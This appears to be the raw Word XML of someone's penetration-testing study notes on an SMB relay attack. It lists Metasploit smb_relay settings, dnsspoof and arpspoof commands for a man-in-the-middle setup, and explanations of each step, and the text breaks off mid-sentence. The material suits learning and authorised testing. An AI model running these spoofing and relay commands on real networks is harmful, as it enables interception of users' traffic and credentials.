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B85B" w14:textId="1D5EC9CF" w:rsidR="00853ABF" w:rsidRPr="00C820E9" w:rsidRDefault="00C820E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C820E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB Relay attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4A088" w14:textId="0088C121" w:rsidR="00C820E9" w:rsidRDefault="00C820E9">
      <w:r>
        <w:t>MITM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A1EC6" w14:textId="032C0B52" w:rsidR="00C820E9" w:rsidRDefault="00C820E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241D8AC4" wp14:editId="40AE8B8A">
            <wp:extent cx="5192202" cy="1068050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41025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54011" name="Picture 4102540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075" cy="107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6146D909" w14:textId="7D5B4351" w:rsidR="00C820E9" w:rsidRDefault="00C820E9">
      <w:r>
        <w:t>Common on window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943BC79" w14:textId="77777777" w:rsidR="00C820E9" w:rsidRDefault="00C820E9"/>
    <w:p w14:paraId="0ED39EF4" w14:textId="4337CE3B" w:rsidR="00C820E9" w:rsidRPr="00C820E9" w:rsidRDefault="00C820E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C820E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE0A44" w14:textId="1614F84D" w:rsidR="00C820E9" w:rsidRDefault="00C820E9" w:rsidP="00C820E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD46449" w14:textId="418C8581" w:rsidR="00C820E9" w:rsidRDefault="00C820E9" w:rsidP="00C820E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capturing authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70FFB5" w14:textId="6EC43149" w:rsidR="00C820E9" w:rsidRDefault="00C820E9" w:rsidP="00C820E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Replaying to a legitimate server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D790D8F" w14:textId="368B9A9E" w:rsidR="00C820E9" w:rsidRDefault="00C820E9" w:rsidP="00C820E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gain access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF855C1" w14:textId="77777777" w:rsidR="00C820E9" w:rsidRDefault="00C820E9"/>
    <w:p w14:paraId="2859672F" w14:textId="121F31BF" w:rsidR="00C20176" w:rsidRPr="00C20176" w:rsidRDefault="00C20176">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20176">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E267A83" w14:textId="091D3B08" w:rsidR="00C20176" w:rsidRDefault="00C20176">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> replay </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>throught</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the Metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F61DEF" w14:textId="36C60035" w:rsidR="00C20176" w:rsidRDefault="00C20176">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35368069" w14:textId="3FA66C0A" w:rsidR="00C20176" w:rsidRDefault="00C20176">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="213D253A" w14:textId="25792952" w:rsidR="00C20176" w:rsidRDefault="00C20176">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC9101" w14:textId="3E7E4758" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122981AC" w14:textId="5F4C6E61" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t xml:space="preserve">Set SRVHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="573222D5" w14:textId="1C9ECA7E" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="113C8FC0" w14:textId="50463935" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">SMBHOST  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C76BBB8" w14:textId="77777777" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6"/>
    <w:p w14:paraId="515980F9" w14:textId="77777777" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6"/>
    <w:p w14:paraId="1F2E4FB7" w14:textId="797BDB7D" w:rsidR="00706476" w:rsidRPr="00706476" w:rsidRDefault="00706476">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now open the new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FC8FA6" w14:textId="48CEC273" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DNS spoofing to redirect the victim to our attacker system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7625F6D0" w14:textId="0056476B" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a file that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>record</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2595CA49" w14:textId="7A79DA1A" w:rsidR="00F04CC6" w:rsidRDefault="00F04CC6">
      <w:r>
        <w:t>Echo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> *.sportsfoo</w:t>
      </w:r>
      <w:r w:rsidR="00AD6734">
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E0FE567" w14:textId="1309508A" w:rsidR="00F04CC6" w:rsidRDefault="00DD7CE7">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>point</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all request or subdomain of it the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EC7CB4C" w14:textId="77777777" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7"/>
    <w:p w14:paraId="7EA8E313" w14:textId="54134F43" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dnsspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857761">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eth1 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78E1BC18" w14:textId="60637DCE" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:r>
        <w:t xml:space="preserve">#  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve">runs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>dnsspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> on interface eth1 using the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> as the host map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34222920" w14:textId="77777777" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7"/>
    <w:p w14:paraId="0C49FB4E" w14:textId="76DB1A13" w:rsidR="00DD7CE7" w:rsidRPr="00706476" w:rsidRDefault="00706476">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now open the new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD2020" w14:textId="52406A54" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>enable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ip_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>forwarding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>turns the host into a router).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980922D" w14:textId="3DC6AF2E" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:r>
        <w:t>Echo 1 &gt; /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D0E698C" w14:textId="738570D6" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arpspoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309B882" w14:textId="11DE3853" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  eth</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">1 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7FBA7" w14:textId="6F6063C1" w:rsidR="00857761" w:rsidRDefault="00857761">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve">tells the </w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00857761">
        <w:t>“the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> gateway’s IP is at </w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>my</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> MAC” (so the target sends gateway-bound traffic to you).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B65826" w14:textId="0A5A753D" w:rsidR="00DD7CE7" w:rsidRPr="00DD7CE7" w:rsidRDefault="00DD7CE7" w:rsidP="00DD7CE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> eth1 = use interface eth1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E606466" w14:textId="77777777" w:rsidR="00DD7CE7" w:rsidRPr="00DD7CE7" w:rsidRDefault="00DD7CE7" w:rsidP="00DD7CE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>-t &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>&gt; = send fake ARP replies to the victim at &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8788C" w14:textId="77777777" w:rsidR="00DD7CE7" w:rsidRPr="00DD7CE7" w:rsidRDefault="00DD7CE7" w:rsidP="00DD7CE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>gateway_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>&gt; = the IP you are claiming to be (usually the network gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61353E04" w14:textId="65B2A7E2" w:rsidR="00DD7CE7" w:rsidRPr="00DD7CE7" w:rsidRDefault="00DD7CE7" w:rsidP="00DD7CE7">
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In plain words:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> it repeatedly tells the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>“hey</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD7CE7">
        <w:t>, the gateway’s IP is at my MAC address now”, so the target sends gateway-bound packets to you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB78D0" w14:textId="77777777" w:rsidR="00DD7CE7" w:rsidRDefault="00DD7CE7"/>
    <w:p w14:paraId="04B12B22" w14:textId="26D2AADA" w:rsidR="00706476" w:rsidRPr="00706476" w:rsidRDefault="00706476">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now open the new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12567771" w14:textId="23022CCA" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Arpspoof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eth1 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gateway_ip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24D35223" w14:textId="28E1860A" w:rsidR="00857761" w:rsidRPr="00857761" w:rsidRDefault="00857761" w:rsidP="00857761">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> tells the </w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00857761">
        <w:t>“the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> target’s IP is at </w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>my</w:t>
      </w:r>
      <w:r w:rsidRPr="00857761">
        <w:t xml:space="preserve"> MAC” (so the gateway sends reply traffic to you).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A8B51" w14:textId="77777777" w:rsidR="00857761" w:rsidRDefault="00857761"/>
    <w:p w14:paraId="5D469FC7" w14:textId="2F0AC24D" w:rsidR="00706476" w:rsidRPr="00706476" w:rsidRDefault="00706476">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Now move to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DA605EC" w14:textId="06350A31" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BBE93" w14:textId="4FC96B62" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:r>
        <w:t>Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E353F" w14:textId="77777777" w:rsidR="00706476" w:rsidRDefault="00706476"/>
    <w:p w14:paraId="6D015B3D" w14:textId="362F3F31" w:rsidR="00AD6734" w:rsidRDefault="00AD6734"/>
    <w:p w14:paraId="09CC9555" w14:textId="77777777" w:rsidR="00AD6734" w:rsidRDefault="00AD6734"/>
    <w:p w14:paraId="522C4349" w14:textId="77777777" w:rsidR="00706476" w:rsidRDefault="00706476"/>
    <w:p w14:paraId="2D792F7D" w14:textId="73113BF3" w:rsidR="00706476" w:rsidRPr="00706476" w:rsidRDefault="00706476">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D14D6E" w14:textId="4C6FECD1" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00706476">
        <w:t>is tricking</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> a computer into thinking a fake IP address is the real address for a domain name — so when the victim </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00706476">
        <w:t>types</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00706476">
        <w:t>bank.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00706476">
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> they get sent to the attacker’s machine instead of the real bank.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE546E" w14:textId="1C4B6A57" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> means a computer is allowed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pass network traffic from one network interface to another</w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> — acting like a router instead of just an endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56410477" w14:textId="27C9CFC4" w:rsidR="00706476" w:rsidRDefault="00706476">
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve">In penetration testing, it’s required for </w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITM attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00706476">
        <w:t xml:space="preserve"> (like ARP spoofing + DNS spoofing), because you need to forward the victim’s traffic to the real gateway — otherwise the victim loses connectivity (denial of service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA53C7C" w14:textId="77777777" w:rsidR="006764B3" w:rsidRDefault="006764B3"/>
    <w:p w14:paraId="00189219" w14:textId="063D74A8" w:rsidR="006764B3" w:rsidRDefault="006764B3">
      <w:r w:rsidRPr="006764B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What enables it:</w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
        <w:t xml:space="preserve"> networks that allow NTLM auth and don’t use SMB signing or proper DNS/DHCP controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0E707" w14:textId="77777777" w:rsidR="006764B3" w:rsidRDefault="006764B3"/>
    <w:p w14:paraId="4E4BFF44" w14:textId="77777777" w:rsidR="006764B3" w:rsidRPr="006764B3" w:rsidRDefault="006764B3" w:rsidP="006764B3">
      <w:r w:rsidRPr="006764B3">
        <w:t>In simplest words:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CBDA7" w14:textId="77777777" w:rsidR="006764B3" w:rsidRPr="006764B3" w:rsidRDefault="006764B3" w:rsidP="006764B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006764B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB (Server Message Block)</w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
        <w:t xml:space="preserve"> is the Windows protocol for file sharing, printers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654835D" w14:textId="77777777" w:rsidR="006764B3" w:rsidRPr="006764B3" w:rsidRDefault="006764B3" w:rsidP="006764B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006764B3">
        <w:t xml:space="preserve">When your computer tries to connect to an SMB share, it sends your </w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
